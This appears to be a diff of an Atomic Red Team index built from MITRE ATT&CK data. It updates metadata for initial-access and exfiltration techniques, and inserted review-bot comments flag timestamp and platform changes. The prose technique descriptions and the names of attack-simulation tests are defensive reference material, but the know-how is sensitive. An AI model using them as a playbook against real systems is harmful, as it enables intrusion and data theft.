x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -117723,6 +118645,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -117731,18 +118654,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -117774,9 +118697,6 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -117859,7 +118779,7 @@ initial-access:
elevation_required: true
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -117870,6 +118790,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -117878,22 +118803,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -117918,36 +118839,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
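Review bot: the T1566 `description` changes scalar style (double-quoted, with `\n\n` escapes) to a `|-` literal block at the same time as its wording changes, so the raw diff cannot show which words actually changed; diff the parsed values of the old and new objects to review the wording in isolation, and check that the trailing space before the old `\n\nVictims` and the final newline are handled as intended by the literal block. The new sentence adds `(Citation: phishing-krebs)`, which needs a matching `external_references` entry; that entry is added in a later hunk for this object, so the citation resolves. The `x_mitre_attack_spec_version` jump from 2.1.0 to 3.2.0 near the top of the hunk is larger than the bumps elsewhere in the patch and looks like an upstream catch-up rather than a local edit.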
@@ -117976,9 +118880,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -117996,7 +118900,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -118034,11 +118942,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -118055,7 +118962,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -118065,7 +118971,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -118074,19 +118980,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -118134,11 +119038,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
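Review bot: key ordering is inconsistent between objects. This hunk moves T1078's `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` to the end of the object (after `object_marking_refs`), while the T1078.001 hunks above move the same two keys up into alphabetical position (`x_mitre_attack_spec_version` after `phase_name`, `x_mitre_modified_by_ref` before `x_mitre_platforms`). Apart from the 3.1.0 to 3.2.0 bump the values are unchanged, so this is pure churn; have the generator emit keys in one deterministic order, or preserve upstream order, so future diffs only show real changes.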
@@ -118158,10 +119063,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
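Review bot: for T1566.004 the platform list drops `SaaS` together with `Office 365` and `Google Workspace` and adds only `Identity Provider`, whereas T1566 and T1566.002 keep `SaaS` in this same patch, and T1189 likewise loses `SaaS` further down. If these match the upstream platform assignments that is fine, but verify it rather than assume it: a sub-technique ending up narrower than its parent is exactly the shape a regeneration bug produces.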
@@ -118194,7 +119097,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -118233,7 +119135,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -118248,7 +119150,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -118328,11 +119229,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -118388,11 +119288,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -118453,8 +119352,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -118482,13 +119381,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -118528,8 +119426,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -118537,13 +119437,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -118574,9 +119474,6 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -118777,7 +119674,7 @@ initial-access:
'
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -118844,11 +119741,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -118900,9 +119796,8 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -119158,7 +120053,7 @@ initial-access:
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -119182,10 +120077,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
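Review bot: the platform rename in the `x_mitre_platforms` block (`Office 365` and `Google Workspace` removed, `Office Suite` added) changes the exact strings that any per-platform index filter keys on; if the index generator still selects techniques by the old names, every technique touched by this rename silently drops out of the Office 365 and Google Workspace indexes. Confirm the generator maps `Office Suite` onto those indexes (or introduces an office-suite index) before merging, and state that in the commit message, since the same rename repeats for T1567.004, T1048 and T1537 below.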
@@ -119204,13 +120098,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -119249,9 +120142,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -119301,7 +120193,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -119321,7 +120212,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
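Review bot: the `modified` timestamp for T1029 goes backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-28T00:26:48.769Z`, which a regeneration from a newer upstream bundle should never produce. Every regressing old value in this diff carries the same `.188Z` millisecond suffix (`2022-04-25T14:00:00.188Z`, `2022-05-11T14:00:00.188Z`, `2023-05-09T14:00:00.188Z`), which looks like a batch release stamp rather than a real edit time, so the new values are probably the genuine ones and the source bundle has changed. Either way, record which upstream bundle the indexes are now generated from, otherwise the next reviewer will read these as data loss.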
@@ -119341,8 +120232,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
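Review bot: deleting both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` from T1029 leaves the object with no spec-version key at all, while its neighbours (T1567, T1567.004) keep `x_mitre_attack_spec_version: 3.2.0`. Any consumer that reads that key to decide how to parse a technique now has to treat a missing key as "pre-3.x object"; if that is the intended contract, say so in the commit message, otherwise keep the `2.1.0` value instead of dropping it.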
T1011:
technique:
@@ -119389,7 +120278,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -119409,7 +120297,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -119431,8 +120319,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -119486,7 +120372,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests:
- name: IcedID Botnet HTTP PUT
@@ -119572,7 +120457,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -119607,12 +120492,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -119637,11 +120520,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
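Review bot: `x_mitre_network_requirements: false` is removed from T1020.001 just under the `x_mitre_data_sources` list with nothing replacing it, and the same key disappears from T1048 further down in this file. The `x_mitre_version` bump to 1.3 suggests upstream retired the field, but if the generator's schema or any index filter still expects it this is where it breaks; confirm the key is absent in the upstream bundle rather than lost by the generator.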
@@ -119684,9 +120566,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -119733,7 +120614,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -119759,7 +120639,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -119792,8 +120672,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests:
- name: Exfiltrate data HTTPS using curl windows
@@ -119902,7 +120780,7 @@ exfiltration:
'
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
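Review bot: the `modified` regression on T1041 (`2023-05-09T14:00:00.188Z` to `2023-04-07T17:09:14.040Z`) is not confined to the old 2.1.0-era objects; this technique keeps `x_mitre_attack_spec_version: 3.1.0` in the hunk that follows, so the cause is the source bundle, not a format migration. One sentence in the commit message explaining the timestamp changes would save the next reader from rediscovering this.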
@@ -119951,7 +120829,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests:
- name: C2 Data Exfiltration
@@ -120015,7 +120892,7 @@ exfiltration:
name: powershell
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -120051,12 +120928,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -120065,7 +120941,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -120089,9 +120964,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
@@ -120217,7 +121091,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
